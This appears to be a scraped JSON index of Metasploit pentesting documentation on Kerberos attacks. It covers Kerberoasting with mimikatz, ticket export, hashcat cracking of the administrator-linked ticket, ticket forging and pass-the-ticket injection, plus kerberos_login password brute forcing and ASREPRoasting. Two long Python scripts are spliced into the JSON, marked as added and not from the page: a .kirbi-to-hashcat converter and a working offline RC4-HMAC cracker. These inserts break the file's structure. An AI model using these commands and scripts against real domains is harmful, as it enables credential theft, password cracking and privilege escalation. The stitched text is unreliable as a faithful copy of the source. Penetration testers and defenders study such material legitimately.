\"A La Vie, A L'Amour\" - (oe.eo) ## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] ) ## \\ / ## &amp;gt; http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( [email protected] ) '#####' &amp;gt; http://pingcastle.com / http://mysmartlogon.com ***/ Success. meterpreter &amp;gt; kiwi_cmd kerberos::ask /target:https/TSTWLPT1000000 Asking for: https/TSTWLPT1000000 * Ticket Encryption Type &amp;amp; kvno not representative at screen Start/End/MaxRenew: 12/16/2022 4:58:34 PM ; 12/17/2022 1:35:41 AM ; 12/23/2022 3:35:41 PM Service Name (02) : https ; TSTWLPT1000000 ; @ EXAMPLE.COM Target Name (02) : https ; TSTWLPT1000000 ; @ EXAMPLE.COM Client Name (01) : Administrator ; @ EXAMPLE.COM Flags 40a10000 : name_canonicalize ; pre_authent ; renewable ; forwardable ; Session Key : 0x00000017 - rc4_hmac_nt 07137dd7d5b801ef8b05c73380b18701 Ticket : 0x00000017 - rc4_hmac_nt ; kvno = 0 [...] . Tickets in the current session can be viewed like so: . meterpreter &amp;gt; kerberos_ticket_list [+] Kerberos tickets found in the current session. [00000000] - 0x00000012 - aes256_hmac Start/End/MaxRenew: 12/16/2022 3:35:41 PM ; 12/17/2022 1:35:41 AM ; 12/23/2022 3:35:41 PM Server Name : krbtgt/EXAMPLE.COM @ EXAMPLE.COM Client Name : Administrator @ EXAMPLE.COM Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ; [00000001] - 0x00000017 - rc4_hmac_nt Start/End/MaxRenew: 12/16/2022 4:58:34 PM ; 12/17/2022 1:35:41 AM ; 12/23/2022 3:35:41 PM Server Name : https/TSTWLPT1000000 @ EXAMPLE.COM Client Name : Administrator @ EXAMPLE.COM Flags 40a10000 : name_canonicalize ; pre_authent ; renewable ; forwardable ; . Export Service Tickets . 
meterpreter &amp;gt; kiwi_cmd kerberos::list /export [00000001] - 0x00000017 - rc4_hmac_nt Start/End/MaxRenew: 12/16/2022 4:58:34 PM ; 12/17/2022 1:35:41 AM ; 12/23/2022 3:35:41 PM Server Name : https/TSTWLPT1000000 @ EXAMPLE.COM Client Name : Administrator @ EXAMPLE.COM Flags 40a10000 : name_canonicalize ; pre_authent ; renewable ; forwardable ; ==================== Base64 of file : 1-40a10000-Administrator@https~TSTWLPT1000000-EXAMPLE.COM.kirbi ==================== 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 MDAwMA== ==================== * Saved to file : 1-40a10000-Administrator@https~TSTWLPT1000000-EXAMPLE.COM.kirbi . Crack Kiwi’s Service Tickets . To crack the service ticket a number of tools can be used. In this example we’ll use hashcat. First we need to convert the ticket we retrieved in the .kirbi format to a format parsable by hashcat. The kirbi2john script, part of Tim Medin’s Kerberoast toolkit, is perfect for this task. First clone the repo, then run the script against the .kirbi file. 
msfuser@ubuntu:~/git$ git clone https://github.com/nidem/kerberoast.git msfuser@ubuntu:~/git$ cd kerberoast msfuser@ubuntu:~/git/kerberoast$ python3 kirbi2john.py ~/1-40a10000-Administrator@HTTP~testService-EXAMPLE.COM.kirbi $krb5tgs$23$*1-40a10000-Administrator@HTTP~testService-EXAMPLE.COM*$2b5cda0496cdd9cfb11a00a9b03a0d31$76975a9115860927140 3a1808746b35d0e99159553e3c81a9cd32a51e968a4b45ce3fcf08e5eac8d4551df10c9f1bd4572cc273d1bd154fc8fd1228d55cd39a90b64ec3117f e0a1fb496d1be4042ccb2998d998fa3de8f50bcb04d3bf78e34be07d71310a3be829e24cb75c398847f960aefe9669534df26344beb6e7bbe628b7ac fa957c4a67417546fc441b84aaee78a0e5256cc9dead287327ac7907af71e02b142027c9061515c72ef03c842d0f73754f9dffa434a26057df4c4434 71cd5bf76260469ea6f1c367a64ea02b01a2b9c2b83979911fc58fa8822c70877b72370078e3d7955fc2ade02acd2a803889a8c3a609f80f9beb45c0 981aba6bdbb208fa6ea2cc91814c8c4dd6e9287f4ef3b9e2b7febe07648c78ec25137e82bee0d99290a33fd3701953bd858fac15c6d1652f11cc75a6 e419cab7dec019e599eda3a76652475968bc2845fa6f02477efaecfd63e58fad817f1976adeda14b2c4c1508a84df1813e05368c3e07c9f656d5730d 848b86c59bf576f4c2505375b7d6934abf8a955b1a71d802026383cbd9005bf12f0664ffc25ebee8aef4b574dd93850d59fc16c5f9881e9b4f957c33 74724e4046c0fa4bc5ff16b9a960b4b6a2ede25bb18c617c2dbcfb3fd34a4cc3ee29fb0f6e6f43722ffc50ceddce55b2be1a53361d13c983980d3191 86c7dbd124a3c8f19560e88d0d858b0f5320738931bf2f32c1e893fbbadb92f7574128f6f36a0acab99023f79d857f15f0920a1a76b3a97e6282d4e6 c5ef30206444bc20da1a7d89d1007a97e75ffb9554cfeaf6757919a635dbdfcfd74d2eec8d5f83f109beb6e653a8c0e787ec039c7bb93d07a60e8bb4 b56d026e809a80e020875a3a382b367f28c0e41714bd5ef97da578956cba12ab1fbcd84a5313d2edc5f7c601c3c56860a347ab013f50e3f8e6167935 9db05e4014db38e21a814fe002ba14d17840aa053bbec3a6aadec31db50827168d24107486d373567c2969215c0decf639bc46b9968e43a79bc6f261 2544feb09908118615035f630e37b03cb04d9725d2085a28543575d91c361bf1b6a61837d6c34c8961df33d1b8b45963bf361d33e0ca2fa37b40e62b 
6389ebb0ad4097036f4d6aa4598086313ea79d68f75301d5038783567c2fdcf25e2b459acdc867c64613fe84f3faf1fdb79fc6e05322b2175eec3b2e 84e3a8165f0af265d3ccd994712704516f0c78f76dd7c5c98f8fc8b9db1231f19c259bc7f078a86d4bc6cf06b8c4158dc41f48dd51b146d3fc63d2fd f057e6644f838a944de0679ab3e8c6290d4d8004bd53570f61323eeb7c910c6546880a508172bf4ee2fa1c87748ec0e2e2f79e03e963affb593f1391 a62fdf2f29b792b1c0e7ece2645381a4284b56ddc525c842589eca39efa0466418c9bfb60df479015f4fac86d38575aad1f29674a12d873f8fc12415 b6ea7b2cb15c9d422f0f904a6af518f12c4e0e362093d8d33a47672973f6d70e80669666f37d6674ef8e2999c92fa38b5de8e266716bb182527bde17 36bcb926a6340ae92f8b338be2fe5fa3a757894679beba5b296fe0cdc11100b9a536264cb5e3cb3c6d0426acaa7dd3928895d32973fab2698d17fff4 f9f1ecd02102f5bbd222b039ca3e30fed4003be6b70b2e492c8ea5eee92439681d6af767547609a87d47b68ba7ca62dbe3e4bf74e081915ab15e4103 8839b74263ddbd087c90b6262dd5684e078068c28ccc0c115e3 tickets written: 1 . Copy the above hash to a file called hash.txt. Ensure hashcat is installed: msfuser@ubuntu:~/git/kerberoast$ sudo apt install hashcat . With a word list of your choice run the following command: . msfuser@ubuntu:~/git/kerberoast$ hashcat -m 13100 --force -a 0 hash.txt wordlist.txt hashcat (v5.1.0) starting... OpenCL Platform #1: The pocl project ==================================== * Device #1: pthread-Intel(R) Core(TM) i7-9750H CPU @ 2.60GHz, 16384/41063 MB allocatable, 6MCU Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Applicable optimizers: * Zero-Byte * Not-Iterated * Single-Hash * Single-Salt Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256 ATTENTION! Pure (unoptimized) OpenCL kernels selected. This enables cracking passwords and salts &amp;gt; length 32 but for the price of drastically reduced performance. If you want to switch to optimized OpenCL kernels, append -O to your commandline. 
Watchdog: Hardware monitoring interface not found on your system. Watchdog: Temperature abort trigger disabled. * Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=8 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=13100 -D _unroll' * Device #1: Kernel m13100_a0-pure.64a04b9e.kernel not found in cache! Building may take a while... Dictionary cache built: * Filename..: wordlist.txt * Passwords.: 3 * Bytes.....: 33 * Keyspace..: 3 * Runtime...: 0 secs The wordlist or mask that you are using is too small. This means that hashcat cannot use the full parallel power of your device(s). Unless you supply more work, your cracking speed will drop. For tips on supplying more work, see: https://hashcat.net/faq/morework Approaching final keyspace - workload adjusted. $krb5tgs$23$*1-40a10000-Administrator@HTTP~testService-EXAMPLE.COM*$2b5cda0496cdd9cfb11a00a9b03a0d31$76975a9115860927140 &amp;lt;truncated due to size&amp;gt; Session..........: hashcat Status...........: Cracked Hash.Type........: Kerberos 5 TGS-REP etype 23 Hash.Target......: $krb5tgs$23$*1-40a10000-Administrator@HTTP~testServ...c115e3 Time.Started.....: Tue Jan 10 07:41:11 2023 (0 secs) Time.Estimated...: Tue Jan 10 07:41:11 2023 (0 secs) Guess.Base.......: File (wordlist.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 26 H/s (0.03ms) @ Accel:32 Loops:1 Thr:64 Vec:8 Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts Progress.........: 3/3 (100.00%) Rejected.........: 0/3 (0.00%) Candidates.1.....: test123 -&amp;gt; N0tpassword! . If you want to view the hash + cracked password at a later date run the above command with --show appended. 
msfuser@ubuntu:~/git/kerberoast$ hashcat -m 13100 --force -a 0 hash.txt wordlist.txt --show $krb5tgs$23$*1-40a10000-Administrator@HTTP~testService-EXAMPLE.COM*$2b5cda0496cdd9cfb11a00a9b03a0d31$76975a9115860927140 &amp;lt;truncated due to size&amp;gt; 39efa046757894679beba5b296fe0cdc11100b9a536264cb5e3cb3c6d0426acaa7dd3928895d32973fab2695476093ddbd087c115e3:N0tpassword! . Rewrite Service Tickets &amp;amp; RAM Injection . With RC4-HMAC (etype 23) the service ticket is encrypted under the NT hash of the service account’s password, so once that password has been cracked the ticket can be rewritten with the Kerberoast kerberoast.py script. The forged ticket can claim to be any domain user, or an account that does not exist at all, and the target service will accept it, because the ticket is validated with the service account’s key alone. Privilege escalation within that service is also possible, as the forged ticket can claim membership of an elevated group such as Domain Admins. ➜ kerberoast git:(master) ✗ python3 kerberoast.py -p N0tpassword! -r 1-40a10000-Administrator@HTTP~testService-EXAMPLE.COM.kirbi -w Administrator.kirbi -u 500 . The new ticket can be injected back into memory with the following Mimikatz command in order to authenticate to the targeted service via Kerberos. meterpreter &amp;gt; kiwi_cmd kerberos::ptt Administrator.kirbi . ",
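As an added example (not from the page, from Metasploit or from the kerberoast toolkit), here is what kirbi2john.py does with an export like the one above: walk the DER-encoded KRB-CRED structure of a .kirbi file, pull the ticket's EncryptedData, and for etype 23 split it into the 16-byte HMAC-MD5 checksum and the RC4 ciphertext that hashcat -m 13100 expects. A real export is about 1.5 KB, so the script builds its own small KRB-CRED to run against, with a constructed placeholder ciphertext and an empty KRB-CRED enc-part; PAGE_EXPORT_PREFIX is the first 72 characters of the base64 printed by kerberos::list /export above and is used only to check the outer header. The label argument is informational (kirbi2john uses the file name); hashcat does not use it when cracking.

```python
"""What kirbi2john.py does: read the KRB-CRED DER in a .kirbi file and emit the ticket as a hashcat -m 13100 line."""
import base64


def der_len(n: int) -> bytes:
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag: int, body: bytes) -> bytes:
    return bytes([tag]) + der_len(len(body)) + body


def ctx(n: int, body: bytes) -> bytes:  # context-specific constructed tag [n]
    return tlv(0xA0 | n, body)


def integer(v: int) -> bytes:
    return tlv(0x02, v.to_bytes((v.bit_length() + 8) // 8, "big"))


def gstring(s: str) -> bytes:  # GeneralString, used for Realm and name-string
    return tlv(0x1B, s.encode())


def seq(*items: bytes) -> bytes:
    return tlv(0x30, b"".join(items))


def build_kirbi(realm: str, service: str, host: str, etype: int, kvno: int, cipher: bytes) -> bytes:
    """A minimal KRB-CRED [APPLICATION 22] holding one Ticket [APPLICATION 1] (RFC 4120 5.3, 5.8)."""
    sname = seq(ctx(0, integer(2)), ctx(1, seq(gstring(service), gstring(host))))  # NT-SRV-INST
    enc_data = seq(ctx(0, integer(etype)), ctx(1, integer(kvno)), ctx(2, tlv(0x04, cipher)))
    ticket = tlv(0x61, seq(ctx(0, integer(5)), ctx(1, gstring(realm)), ctx(2, sname), ctx(3, enc_data)))
    cred_enc = seq(ctx(0, integer(0)), ctx(2, tlv(0x04, b"")))  # mimikatz puts a clear EncKrbCredPart here
    return tlv(0x76, seq(ctx(0, integer(5)), ctx(1, integer(22)), ctx(2, seq(ticket)), ctx(3, cred_enc)))


def der_read(buf: bytes, pos: int = 0):
    """Return (tag, value, end) for the definite-length TLV starting at pos."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def der_children(body: bytes) -> list:
    """All (tag, value) pairs packed back to back in body."""
    out, pos = [], 0
    while pos < len(body):
        tag, value, pos = der_read(body, pos)
        out.append((tag, value))
    return out


def fields(wrapped_seq: bytes) -> dict:
    """{context tag: value} for the SEQUENCE whose TLV star*ts wrapped_seq."""
    return dict(der_children(der_read(wrapped_seq)[1]))


def export_header(b64: str):
    """Outer tag and declared total size of a (possibly truncated) base64 export; 0x76 is APPLICATION 22."""
    tag, _, end = der_read(base64.b64decode(b64))
    return tag, end


def kirbi_to_hashcat(kirbi: bytes, label: str) -> list:
    """One $krb5tgs$23$ line per RC4-HMAC ticket in the KRB-CRED."""
    tag, body, _ = der_read(kirbi)
    if tag != 0x76:
        raise ValueError("not a KRB-CRED")
    lines = []
    for _, ticket_body in der_children(der_read(fields(body)[0xA2])[1]):  # tickets [2] SEQUENCE OF Ticket
        t = fields(ticket_body)
        realm = der_read(t[0xA1])[1].decode()
        spn = "/".join(v.decode() for _, v in der_children(der_read(fields(t[0xA2])[0xA1])[1]))
        enc = fields(t[0xA3])
        etype = int.from_bytes(der_read(enc[0xA0])[1], "big")
        cipher = der_read(enc[0xA2])[1]
        if etype != 23:
            raise ValueError(f"etype {etype} is not RC4-HMAC; AES tickets need the hashcat 19600/19700 formats")
        # etype 23 EncryptedData = 16-byte HMAC-MD5 checksum || RC4 ciphertext; hashcat wants them split by '$'
        lines.append(f"$krb5tgs$23$*{label}${realm}${spn}*${cipher[:16].hex()}${cipher[16:].hex()}")
    return lines


# First 72 characters of the base64 export shown above; enough to check the outer KRB-CRED header.
PAGE_EXPORT_PREFIX = "doIGMDCCBiygAwIBBaEDAgEWooIFQTCCBT1hggU5MIIFNaADAgEFoQ0bC0VYQU1QTEUuQ09N"

# Constructed stand-in ciphertext (real tickets are ~1.2 KB) inside a ticket for the SPN from the walkthrough.
SAMPLE_CIPHER = bytes(range(256)) * 2
SAMPLE_KIRBI = build_kirbi("EXAMPLE.COM", "https", "TSTWLPT1000000", 23, 2, SAMPLE_CIPHER)

if __name__ == "__main__":
    print(base64.b64encode(SAMPLE_KIRBI).decode()[:64], "...")
    for hashline in kirbi_to_hashcat(SAMPLE_KIRBI, "1-40a10000-Administrator@https~TSTWLPT1000000-EXAMPLE.COM"):
        print(hashline[:96], "...")
```

Run it as a script to see the base64 of the constructed KRB-CRED (its first bytes, 76 82 ..., match the export above) and the resulting hash line; feed a real .kirbi to kirbi_to_hashcat to get a line for hash.txt. The parser only handles definite-length DER, which is what mimikatz writes.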
    "url": "/docs/pentesting/active-directory/kerberos/kerberoasting.html#scenarios",
    "relUrl": "/docs/pentesting/active-directory/kerberos/kerberoasting.html#scenarios"
  },"515": {
    "doc": "Kerberos login enumeration and bruteforcing",
    "title": "Kerberos Login/Bruteforce",
    "content": "The auxiliary/scanner/kerberos/kerberos_login module can verify Kerberos credentials against a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access. It will also store Kerberos tickets (TGTs), which remain valid until they expire even after the user’s password has been changed. For accounts which do not require pre-authentication, the KDC returns an AS-REP whose encrypted part is keyed with the user’s password; the module logs that response for offline cracking, a technique known as AS-REP Roasting. This module is able to identify the following information from the KDC: . | Valid/Invalid accounts | Locked/Disabled accounts | Accounts with expired passwords, when the password matches | AS-REP Roastable accounts | . ",
    "url": "/docs/pentesting/active-directory/kerberos/kerberos_login.html#kerberos-loginbruteforce",
    "relUrl": "/docs/pentesting/active-directory/kerberos/kerberos_login.html#kerberos-loginbruteforce"
  },"516": {
    "doc": "Kerberos login enumeration and bruteforcing",
    "title": "Target",
    "content": "To use the kerberos_login module, make sure you are able to connect to the Kerberos service on a Domain Controller. ",
    "url": "/docs/pentesting/active-directory/kerberos/kerberos_login.html#target",
    "relUrl": "/docs/pentesting/active-directory/kerberos/kerberos_login.html#target"
  },"517": {
    "doc": "Kerberos login enumeration and bruteforcing",
    "title": "Scenarios",
    "content": "Creating a single Kerberos ticket (TGT) . To create a single Kerberos ticket (TGT), set the username and password options: . msf6 auxiliary(scanner/kerberos/kerberos_login) &amp;gt; run rhost=192.168.123.133 domain=DEMO.local username=basic_user password=password verbose=true [*] Using domain: DEMO.LOCAL - 192.168.123.133:88 ... [+] 192.168.123.133 - User found: \"basic_user\" with password password [*] Auxiliary module execution completed . Auth Brute . The following demonstrates basic usage, using a custom wordlist, targeting a single Domain Controller to identify valid domain user accounts and additionally bruteforcing passwords: . Create a new ./users.txt file and ./wordlist.txt, then run the module: . msf6 auxiliary(gather/kerberos_enumusers) &amp;gt; run rhost=192.168.123.133 domain=DEMO.local user_file=./users.txt pass_file=./wordlist.txt verbose=true [*] Using domain: DEMO.LOCAL - 192.168.123.133:88 ... [+] 192.168.123.133 - User: \"basic_user\" is present [*] 192.168.123.133 - User: \"basic_user\" wrong password invalid2 [*] 192.168.123.133 - User: \"basic_user\" wrong password p4$$w0rd [*] 192.168.123.133 - User: \"basic_user\" wrong password test_password [+] 192.168.123.133 - User found: \"basic_user\" with password password. Hash: [email protected]:959b983f9cffc093002d9cd8a20...etc... [*] 192.168.123.133 - User: \"foo\" user not found [*] 192.168.123.133 - User: \"foo_bar\" user not found [+] 192.168.123.133 - User: \"Administrator\" is present [*] 192.168.123.133 - User: \"Administrator\" wrong password invalid2 [*] 192.168.123.133 - User: \"Administrator\" wrong password p4$$w0rd [*] 192.168.123.133 - User: \"Administrator\" wrong password test_password [*] 192.168.123.133 - User: \"Administrator\" wrong password password [+] 192.168.123.133 - User: \"no_pre_auth\" does not require preauthentication. Hash: [email protected]:a714f0553589cbd78...etc... 
[+] 192.168.123.133 - User: \"admin\" is present [*] 192.168.123.133 - User: \"admin\" wrong password invalid2 [*] 192.168.123.133 - User: \"admin\" - Kerberos Error - KDC_ERR_KEY_EXPIRED (23) - Password has expired - change password to reset [*] 192.168.123.133 - User: \"admin\" wrong password test_password [*] 192.168.123.133 - User: \"admin\" wrong password password [*] Auxiliary module execution completed . ASREPRoasting . Accounts that have Do not require Kerberos preauthentication enabled will receive an AS-REP from the KDC without first proving knowledge of the password. The AS-REP contains an encrypted part keyed with the user’s password, so it can be cracked offline; this technique is called ASREPRoasting. A hash starting with $krb5asrep$23$ was encrypted with RC4-HMAC and is cracked with hashcat mode 18200; AES responses start with $krb5asrep$17$ or $krb5asrep$18$ and need modes 19800 or 19900. Cracking ASREP response with John: . john ./hashes.txt --wordlist=./wordlist.txt --format:krb5asrep . Cracking ASREP response with Hashcat: . hashcat -m 18200 -a 0 ./hashes.txt ./wordlist.txt . You can see previously cracked creds with: . creds -v . ",
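The following is an added example, not code from the page or from Metasploit, of the offline check that hashcat -m 13100 (the Kerberoasting walkthrough) and -m 18200 (the ASREPRoasting step above) perform on RC4-HMAC (etype 23) material: derive the NT hash from a candidate password, then run the RFC 4757 decryption and compare the HMAC-MD5 checksum. It implements MD4 itself because hashlib.new("md4") needs OpenSSL's legacy provider. Key usage 2 is used for the TGS-REP ticket and 8 for the AS-REP encrypted part, which is what hashcat and john implement for Windows KDCs. The two sample hash lines and the wordlist are constructed inside the script: the account and realm names mirror the lab (svc_kerberoastable in ADF3.LOCAL, no_pre_auth in DEMO.LOCAL), but the blobs are not real KDC output and the no_pre_auth password is invented.

```python
"""Offline check of RC4-HMAC (etype 23) Kerberos blobs: the work behind hashcat -m 13100 and -m 18200."""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python; hashlib.new('md4') needs OpenSSL's legacy provider and is often missing."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (  # per round: mixing function, additive constant, order of X[k], shift amounts
        (f, 0, list(range(16)), (3, 7, 11, 19)),
        (g, 0x5A827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, const, order, shifts in rounds:
            for i, k in enumerate(order):
                a, b, c, d = d, rotl((a + fn(b, c, d) + x[k] + const) & MASK, shifts[i % 4]), b, c
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def nt_hash(password: str) -> bytes:
    """The RC4-HMAC key is MD4 over the UTF-16LE password, i.e. the NT hash (RFC 4757)."""
    return md4(password.encode("utf-16-le"))


def _k1(key: bytes, usage: int) -> bytes:
    return hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes) -> bytes:
    """RFC 4757 encrypt: checksum || RC4(K3, confounder || plaintext); used here only to build samples."""
    k1 = _k1(key, usage)
    data = confounder + plaintext
    checksum = hmac.new(k1, data, hashlib.md5).digest()
    return checksum + rc4(hmac.new(k1, checksum, hashlib.md5).digest(), data)


def rc4_hmac_verify(key: bytes, usage: int, checksum: bytes, ciphertext: bytes) -> bool:
    """True when this key reproduces the 16-byte checksum, i.e. the candidate password is the real one."""
    k1 = _k1(key, usage)
    data = rc4(hmac.new(k1, checksum, hashlib.md5).digest(), ciphertext)
    return hmac.compare_digest(hmac.new(k1, data, hashlib.md5).digest(), checksum)


def parse_hash_line(line: str):
    """Split a hashcat-style line into (key usage, label, checksum, ciphertext)."""
    if line.startswith("$krb5tgs$23$"):  # TGS-REP ticket enc-part, key usage 2 (-m 13100)
        label, enc = line[len("$krb5tgs$23$"):].rsplit("*$", 1)
        usage = 2
    elif line.startswith("$krb5asrep$23$"):  # AS-REP enc-part; Windows KDCs use key usage 8 (-m 18200)
        label, enc = line[len("$krb5asrep$23$"):].split(":", 1)
        usage = 8
    else:
        raise ValueError("only etype 23 lines handled; AES needs hashcat -m 19600/19700 (TGS) or 19800/19900 (AS-REP)")
    checksum_hex, edata_hex = enc.split("$", 1)
    return usage, label.strip("*"), bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)


def crack(line: str, wordlist):
    """Return the first wordlist entry whose NT hash verifies the blob, or None."""
    usage, _, checksum, edata = parse_hash_line(line)
    for candidate in wordlist:
        if rc4_hmac_verify(nt_hash(candidate), usage, checksum, edata):
            return candidate
    return None


# Constructed samples (not real KDC output): a ticket for the lab service account and an AS-REP for a
# hypothetical no-preauth account, with a fixed confounder so the lines are reproducible run to run.
_CONF = b"\x01" * 8
_TGS = rc4_hmac_encrypt(nt_hash("password123"), 2, b"<constructed EncTicketPart>", _CONF)
_ASREP = rc4_hmac_encrypt(nt_hash("Autumn2022"), 8, b"<constructed EncASRepPart>", _CONF)
SAMPLE_TGS_LINE = f"$krb5tgs$23$*svc_kerberoastable$ADF3.LOCAL$adf3.local/svc_kerberoastable*${_TGS[:16].hex()}${_TGS[16:].hex()}"
SAMPLE_ASREP_LINE = f"$krb5asrep$23$no_pre_auth@DEMO.LOCAL:{_ASREP[:16].hex()}${_ASREP[16:].hex()}"
WORDLIST = ["test123", "p4$$w0rd", "password123", "Autumn2022"]

if __name__ == "__main__":
    for sample in (SAMPLE_TGS_LINE, SAMPLE_ASREP_LINE):
        print(sample[:48] + "...", "->", crack(sample, WORDLIST))
```

The check per candidate is one MD4, three HMAC-MD5s and one RC4 pass over the blob, which is why a weak service-account password falls in seconds even without a GPU; the same verify step, keyed usage 8, is what makes a no-preauth account crackable by anyone who can send an AS-REQ. Real lines from get_user_spns, kirbi2john or kerberos_login can be passed to crack() unchanged.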
    "url": "/docs/pentesting/active-directory/kerberos/kerberos_login.html#scenarios",
    "relUrl": "/docs/pentesting/active-directory/kerberos/kerberos_login.html#scenarios"
  },"518": {
    "doc": "Kerberos login enumeration and bruteforcing",
    "title": "Options",
